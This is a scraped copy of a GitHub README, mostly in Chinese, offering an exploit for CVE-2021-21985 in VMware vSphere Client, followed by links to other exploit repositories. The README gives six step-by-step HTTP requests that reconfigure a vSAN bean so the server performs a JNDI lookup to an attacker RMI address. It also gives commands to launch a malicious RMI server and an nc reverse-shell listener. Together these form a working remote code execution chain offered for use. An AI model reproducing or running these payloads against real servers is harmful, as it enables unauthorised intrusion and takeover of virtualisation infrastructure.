Github GitHub - xnianq/cve-2021-21985_exp: cve-2021-21985 exploit

3 years ago

source link: https://github.com/xnianq/cve-2021-21985_exp
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

cve-2021-21985 exploit

0x01 漏洞点

分析可见：

https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis

0x02 exploit

对beans对象进行重新构造，实现rce。

bean列表：

localizedMessageBundle
vsanWorkerThreadFactory
vsanThreadPoolImpl
vsanServiceBundleActivator
vsanServiceFactory
vsanProviderUtils_setVmodlHelper
vsanProviderUtils_setVsanServiceFactory
vsanQueryUtil_setDataService
vsanComponentsProviderImpl
capabilityPropertyProviderImpl
pbmDataProviderImpl
vsanCapabilityCacheManager
vsanCapabilityUtils_setVsanCapabilityCacheManager
vsanUtils_setMessageBundle
vsanFormatUtils_setUserSessionService

随风大佬使用的vsanProviderUtils_setVmodlHelper在我这边环境没测试成功，就选用了另外的bean进行测试，由于Vsphere UI使用的tomcat中间件，可以通过jndi rmi bypass(https://github.com/welk1n/JNDI-Injection-Bypass/blob/master/src/main/java/payloads/EvilRMIServer.java）远程执行命令。

Step1
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetObject
{"methodInput":[null]}


Step2
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setStaticMethod
{"methodInput":["javax.naming.InitialContext.doLookup"]}

Step3
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetMethod
{"methodInput":["doLookup"]}

Step4 
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setArguments
{"methodInput":[["rmi://attip:1097/ExecByEL"]]}

Step5
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/prepare
{"methodInput":[]}

Step6
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/invoke
{"methodInput":[]}

0x03 使用方法

启动rmi服务 java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer attip
启动reverse shell 侦听

nc -lvvp 5555

执行以上payload，得到reverse shell

0x04 reference

Recommend

164

Github github.com 7 years ago
Cache

GitHub - V-E-O/PoC: PoC of CVE/Exploit

V-E-O/PoC: PoC of CVE/Exploit Skip to content...

Github github.com 4 years ago
Cache

IntelTXE-PoC/me_exp_bxtp.py at master · ptresearch/IntelTXE-PoC · GitHub

master IntelTXE-PoC/me_exp_bxtp.py / Jump to

220

www.offensive-security.com 4 years ago
Cache

Windows User Mode Exploit Development (EXP-301)

Course Overview Windows User Mode Exploit Development (EXP-301) is an intermediate-level course which teaches students the fundamentals of modern exploit development. It starts with basic buffer overflow at...

Github github.com 3 years ago
Cache

Github GitHub - mavillon1/CVE-2021-33739-POC

Files Permalink Latest commit message Commit time

Github github.com 3 years ago
Cache

GitHub - Summer177/seeyon_exp: 致远OA综合利用工具

README.md 致远OA漏洞检查与利用工具，收录漏洞如下：...

blog.kie.org 3 years ago
Cache

KIE & Log4j2 exploit CVE-2021-44228

KIE & Log4j2 exploit CVE-2021-44228by Mario Fusco - December 13, 2021

Github github.com 3 years ago
Cache

GitHub - Bonfee/CVE-2022-0995: CVE-2022-0995 exploit

CVE-2022-0995 This is my exploit for CVE-2022-0995, an heap out-of-bounds write in the watch_queue Linux kernel component. It uses the same technique described in

Github github.com 3 years ago
Cache

GitHub - plummm/CVE-2022-27666: Exploit for CVE-2022-27666

README.md ...

nitesculucian.github.io 2 years ago
Cache

AttackDefense.com [RCE] - CVE-2018-9037 Exploit

AttackDefense.com [RCE] - CVE-2018-9037 Exploit Dec 7, 2018 •...

Github github.com 2 years ago
Cache

CVE-2022-44666/exploit.vcf at main · j00sean/CVE-2022-44666 · GitHub

CVE-2022-44666/exploit.vcf at main · j00sean/CVE-2022-44666 · GitHub Skip to content...